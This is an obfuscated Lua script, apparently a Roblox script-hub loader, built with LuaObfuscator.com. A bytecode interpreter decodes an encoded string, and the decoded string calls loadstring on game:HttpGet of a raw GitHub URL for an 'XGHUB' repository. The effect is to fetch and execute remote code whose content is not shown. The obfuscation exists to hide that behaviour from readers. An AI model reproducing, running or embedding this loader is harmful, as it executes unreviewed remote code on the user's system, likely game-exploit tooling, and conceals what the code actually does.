--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 1;
	local v19;
	v16 = v4(v3(v16, 5), "..", function(v30)
		if (v1(v30, 2) == 79) then
			local v80 = 0;
			while true do
				if (v80 == 0) then
					v19 = v0(v3(v30, 1, 1));
					return "";
				end
			end
		else
			local v81 = v2(v0(v30, 16));
			if v19 then
				local v88 = v5(v81, v19);
				v19 = nil;
				return v88;
			else
				return v81;
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local v82 = 0 - 0;
			local v83;
			while true do
				if (v82 == (0 + 0)) then
					v83 = (v31 / ((5 - 3) ^ (v32 - ((118 - (32 + 85)) - 0)))) % ((1639 - (1523 + 114)) ^ (((v33 - ((1 + 1) - 1)) - (v32 - (620 - (555 + 64)))) + ((914 + 18) - (857 + 74))));
					return v83 - (v83 % (1066 - (68 + 997)));
				end
			end
		else
			local v84 = 2 ^ (v32 - (569 - (367 + 201)));
			return (((v31 % (v84 + v84)) >= v84) and ((1885 - (892 + 65)) - (214 + (1700 - 987)))) or (0 - 0);
		end
	end
	local function v21()
		local v34 = v1(v16, v18, v18);
		v18 = v18 + 1;
		return v34;
	end
	local function v22()
		local v35, v36 = v1(v16, v18, v18 + (3 - 1));
		v18 = v18 + 2;
		return (v36 * (469 - 213)) + v35;
	end
	local function v23()
		local v37, v38, v39, v40 = v1(v16, v18, v18 + ((1402 - 1049) - (87 + 263)));
		v18 = v18 + ((1136 - (802 + 150)) - (67 + 113));
		return (v40 * (12302277 + 4474939)) + (v39 * (160901 - 95365)) + (v38 * ((508 - 319) + 67)) + v37;
	end
	local function v24()
		local v41 = v23();
		local v42 = v23();
		local v43 = 1;
		local v44 = (v20(v42, 1 - 0, 15 + 5) * (((1437 - (145 + 293)) - (915 + 82)) ^ (90 - 58))) + v41;
		local v45 = v20(v42, 21, 19 + (442 - (44 + 386)));
		local v46 = ((v20(v42, 41 - 9) == (1188 - (1069 + 118))) and -(2 - 1)) or ((1487 - (998 + 488)) - 0);
		if (v45 == (0 + 0)) then
			if (v44 == (0 - (0 + 0))) then
				return v46 * 0;
			else
				local v89 = 0 + 0;
				while true do
					if (v89 == (791 - (368 + 423))) then
						v45 = 3 - (2 + 0);
						v43 = (790 - (201 + 571)) - (10 + (1146 - (116 + 1022)));
						break;
					end
				end
			end
		elseif (v45 == (7874 - 5827)) then
			return ((v44 == (442 - (416 + 26))) and (v46 * (((12 - 9) - 2) / (0 + 0)))) or (v46 * NaN);
		end
		return v8(v46, v45 - 1023) * (v43 + (v44 / (2 ^ (91 - 39))));
	end
	local function v25(v47)
		local v48;
		if not v47 then
			local v85 = 0;
			while true do
				if ((0 + 0) == v85) then
					v47 = v23();
					if (v47 == (0 - (0 - 0))) then
						return "";
					end
					break;
				end
			end
		end
		v48 = v3(v16, v18, (v18 + v47) - ((1 + 2) - 2));
		v18 = v18 + v47;
		local v49 = {};
		for v64 = 860 - (814 + 45), #v48 do
			v49[v64] = v2(v1(v3(v48, v64, v64)));
		end
		return v6(v49);
	end
	local v26 = v23;
	local function v27(...)
		return {...}, v12("#", ...);
	end
	local function v28()
		local v50 = 808 - (740 + 68);
		local v51;
		local v52;
		local v53;
		local v54;
		local v55;
		local v56;
		local v57;
		while true do
			if ((1 + 1) ~= v50) then
			else
				v55 = nil;
				v56 = nil;
				v50 = 1 + 2;
			end
			if (v50 ~= (839 - (660 + 176))) then
			else
				v57 = nil;
				while true do
					if (1 ~= v51) then
					else
						local v96 = 0 + 0;
						while true do
							if (v96 ~= (1 + 0)) then
							else
								for v99 = 203 - (14 + 188), v56 do
									local v100 = 675 - (534 + 141);
									local v101;
									local v102;
									while true do
										if (v100 == 0) then
											local v112 = 0 + 0;
											local v113;
											while true do
												if ((0 + 0) ~= v112) then
												else
													v113 = 0 + 0;
													while true do
														if (v113 == (1 - 0)) then
															v100 = 1 - 0;
															break;
														end
														if (v113 == (1145 - (466 + 679))) then
															local v154 = 0 - 0;
															while true do
																if (v154 == (1 + 0)) then
																	v113 = 2 - 1;
																	break;
																end
																if (v154 == 0) then
																	v101 = v21();
																	v102 = nil;
																	v154 = 1 + 0;
																end
															end
														end
													end
													break;
												end
											end
										end
										if (v100 == (2 - 1)) then
											if (v101 == 1) then
												v102 = v21() ~= (1900 - (106 + 1794));
											elseif (v101 == (1 + 1)) then
												v102 = v24();
											elseif (v101 == 3) then
												v102 = v25();
											end
											v57[v99] = v102;
											break;
										end
									end
								end
								v55[399 - (115 + 281)] = v21();
								v96 = 5 - 3;
							end
							if (v96 ~= (0 - 0)) then
							else
								v56 = v23();
								v57 = {};
								v96 = 1;
							end
							if (v96 == (116 - (4 + 110))) then
								v51 = 586 - (57 + 527);
								break;
							end
						end
					end
					if (v51 ~= (4 - 2)) then
					else
						local v97 = 0;
						while true do
							if (v97 == 0) then
								for v103 = 1428 - (41 + 1386), v23() do
									local v104 = 0;
									local v105;
									local v106;
									local v107;
									while true do
										if (0 == v104) then
											v105 = 0 + 0;
											v106 = nil;
											v104 = 2 - 1;
										end
										if ((1 - 0) == v104) then
											v107 = nil;
											while true do
												if (v105 ~= 1) then
												else
													while true do
														if (v106 ~= (0 - 0)) then
														else
															v107 = v21();
															if (v20(v107, 1, 2 - 1) ~= (867 - (550 + 317))) then
															else
																local v155 = 0 - 0;
																local v156;
																local v157;
																local v158;
																local v159;
																local v160;
																while true do
																	if (v155 == 2) then
																		v160 = nil;
																		while true do
																			if (2 == v156) then
																				while true do
																					if (v157 == 3) then
																						if (v20(v159, 5 - 2, 9 - 6) == (1 + 0)) then
																							v160[4 - 0] = v57[v160[11 - 7]];
																						end
																						v52[v103] = v160;
																						break;
																					end
																					if (v157 ~= 2) then
																					else
																						local v164 = 0;
																						while true do
																							if (v164 ~= 0) then
																							else
																								if (v20(v159, 1, 286 - (134 + 151)) == (66 - (30 + 35))) then
																									v160[1667 - (970 + 695)] = v57[v160[2 + 0]];
																								end
																								if (v20(v159, 3 - 1, 2) ~= (1991 - (582 + 1408))) then
																								else
																									v160[10 - 7] = v57[v160[3 - 0]];
																								end
																								v164 = 3 - 2;
																							end
																							if (v164 == 1) then
																								v157 = 1827 - (1195 + 629);
																								break;
																							end
																						end
																					end
																					if ((1 - 0) == v157) then
																						v160 = {v22(),v22(),nil,nil};
																						if (v158 == (0 + 0)) then
																							local v168 = 0 - 0;
																							local v169;
																							local v170;
																							while true do
																								if (v168 == (0 - 0)) then
																									v169 = 0 - 0;
																									v170 = nil;
																									v168 = 1 + 0;
																								end
																								if (v168 == (1637 - (1373 + 263))) then
																									while true do
																										if (v169 == (1000 - (451 + 549))) then
																											v170 = 0 + 0;
																											while true do
																												if (v170 == (320 - (53 + 267))) then
																													v160[4 - 1] = v22();
																													v160[417 - (15 + 398)] = v22();
																													break;
																												end
																											end
																											break;
																										end
																									end
																									break;
																								end
																							end
																						elseif (v158 == (983 - (18 + 964))) then
																							v160[3] = v23();
																						elseif (v158 == 2) then
																							v160[4 - 1] = v23() - (2 ^ (1400 - (746 + 638)));
																						elseif (v158 == 3) then
																							local v177 = 0 + 0;
																							local v178;
																							local v179;
																							while true do
																								if (v177 == (0 + 0)) then
																									v178 = 0 - 0;
																									v179 = nil;
																									v177 = 1;
																								end
																								if (v177 == (851 - (20 + 830))) then
																									while true do
																										if (0 ~= v178) then
																										else
																											v179 = 341 - (218 + 123);
																											while true do
																												if (v179 == (126 - (116 + 10))) then
																													v160[1584 - (1535 + 46)] = v23() - ((2 + 0) ^ (3 + 13));
																													v160[4] = v22();
																													break;
																												end
																											end
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																						v157 = 3 - 1;
																					end
																					if (v157 == (560 - (306 + 254))) then
																						local v165 = 0;
																						while true do
																							if ((0 + 0) ~= v165) then
																							else
																								v158 = v20(v107, 2, 3);
																								v159 = v20(v107, 7 - 3, 6);
																								v165 = 1468 - (899 + 568);
																							end
																							if (v165 == (1 + 0)) then
																								v157 = 2 - 1;
																								break;
																							end
																						end
																					end
																				end
																				break;
																			end
																			if (v156 ~= (604 - (268 + 335))) then
																			else
																				local v162 = 0;
																				while true do
																					if (v162 == (0 - 0)) then
																						v159 = nil;
																						v160 = nil;
																						v162 = 291 - (60 + 230);
																					end
																					if (v162 ~= (1552 - (1126 + 425))) then
																					else
																						v156 = 574 - (426 + 146);
																						break;
																					end
																				end
																			end
																			if (v156 == (0 + 0)) then
																				v157 = 1456 - (282 + 1174);
																				v158 = nil;
																				v156 = 3 - 2;
																			end
																		end
																		break;
																	end
																	if (0 == v155) then
																		v156 = 0;
																		v157 = nil;
																		v155 = 1122 - (118 + 1003);
																	end
																	if (v155 == 1) then
																		v158 = nil;
																		v159 = nil;
																		v155 = 813 - (569 + 242);
																	end
																end
															end
															break;
														end
													end
													break;
												end
												if ((0 - 0) ~= v105) then
												else
													local v148 = 0;
													local v149;
													while true do
														if (v148 ~= (0 + 0)) then
														else
															v149 = 0 + 0;
															while true do
																if (v149 == 0) then
																	local v161 = 1024 - (706 + 318);
																	while true do
																		if (v161 == (1251 - (721 + 530))) then
																			v106 = 1271 - (945 + 326);
																			v107 = nil;
																			v161 = 1 + 0;
																		end
																		if (v161 == (1 + 0)) then
																			v149 = 2 - 1;
																			break;
																		end
																	end
																end
																if (v149 == (1 + 0)) then
																	v105 = 1 + 0;
																	break;
																end
															end
															break;
														end
													end
												end
											end
											break;
										end
									end
								end
								for v108 = 701 - (271 + 429), v23() do
									v53[v108 - 1] = v28();
								end
								v97 = 1 + 0;
							end
							if ((1 + 0) == v97) then
								return v55;
							end
						end
					end
					if (v51 ~= (1500 - (1408 + 92))) then
					else
						v52 = {};
						v53 = {};
						v54 = {};
						v55 = {v52,v53,nil,v54};
						v51 = 2 - 1;
					end
				end
				break;
			end
			if (1 == v50) then
				v53 = nil;
				v54 = nil;
				v50 = 1 + 1;
			end
			if (v50 == (1171 - (418 + 753))) then
				v51 = 0 + 0;
				v52 = nil;
				v50 = 1;
			end
		end
	end
	local function v29(v58, v59, v60)
		local v61 = v58[1];
		local v62 = v58[2];
		local v63 = v58[3];
		return function(...)
			local v66 = v61;
			local v67 = v62;
			local v68 = v63;
			local v69 = v27;
			local v70 = 1;
			local v71 = -1;
			local v72 = {};
			local v73 = {...};
			local v74 = v12("#", ...) - 1;
			local v75 = {};
			local v76 = {};
			for v86 = 0, v74 do
				if (v86 >= v68) then
					v72[v86 - v68] = v73[v86 + 1];
				else
					v76[v86] = v73[v86 + 1];
				end
			end
			local v77 = (v74 - v68) + 1;
			local v78;
			local v79;
			while true do
				local v87 = 0;
				while true do
					if (v87 == 1) then
						if (v79 <= 6) then
							if (v79 <= 2) then
								if (v79 <= 0) then
									v76[v78[2]]();
								elseif (v79 == 1) then
									do
										return;
									end
								else
									local v115 = v78[2];
									v76[v115] = v76[v115](v13(v76, v115 + 1, v71));
								end
							elseif (v79 <= 4) then
								if (v79 == 3) then
									v76[v78[2]] = v78[3];
								else
									local v119 = v78[2];
									local v120, v121 = v69(v76[v119](v13(v76, v119 + 1, v78[3])));
									v71 = (v121 + v119) - 1;
									local v122 = 0;
									for v143 = v119, v71 do
										v122 = v122 + 1;
										v76[v143] = v120[v122];
									end
								end
							elseif (v79 > 5) then
								do
									return;
								end
							else
								local v123 = v78[2];
								local v124, v125 = v69(v76[v123](v13(v76, v123 + 1, v78[3])));
								v71 = (v125 + v123) - 1;
								local v126 = 0;
								for v146 = v123, v71 do
									local v147 = 0;
									while true do
										if (v147 == 0) then
											v126 = v126 + 1;
											v76[v146] = v124[v126];
											break;
										end
									end
								end
							end
						elseif (v79 <= 9) then
							if (v79 <= 7) then
								v76[v78[2]] = v78[3];
							elseif (v79 == 8) then
								v76[v78[2]]();
							else
								v76[v78[2]] = v60[v78[3]];
							end
						elseif (v79 <= 11) then
							if (v79 == 10) then
								local v129 = v78[2];
								local v130 = v76[v78[3]];
								v76[v129 + 1] = v130;
								v76[v129] = v130[v78[4]];
							else
								local v134 = v78[2];
								local v135 = v76[v78[3]];
								v76[v134 + 1] = v135;
								v76[v134] = v135[v78[4]];
							end
						elseif (v79 == 12) then
							v76[v78[2]] = v60[v78[3]];
						else
							local v141 = 0;
							local v142;
							while true do
								if (v141 == 0) then
									v142 = v78[2];
									v76[v142] = v76[v142](v13(v76, v142 + 1, v71));
									break;
								end
							end
						end
						v70 = v70 + 1;
						break;
					end
					if (v87 == 0) then
						v78 = v66[v70];
						v79 = v78[1];
						v87 = 1;
					end
				end
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C756E6978313734372F58474855422F6D61696E2F5867684D61696E00083O0012093O00013O001209000100023O00200A000100010003001207000300044O0004000100034O00025O00022O00083O000100012O00013O00017O00", v9(), ...);
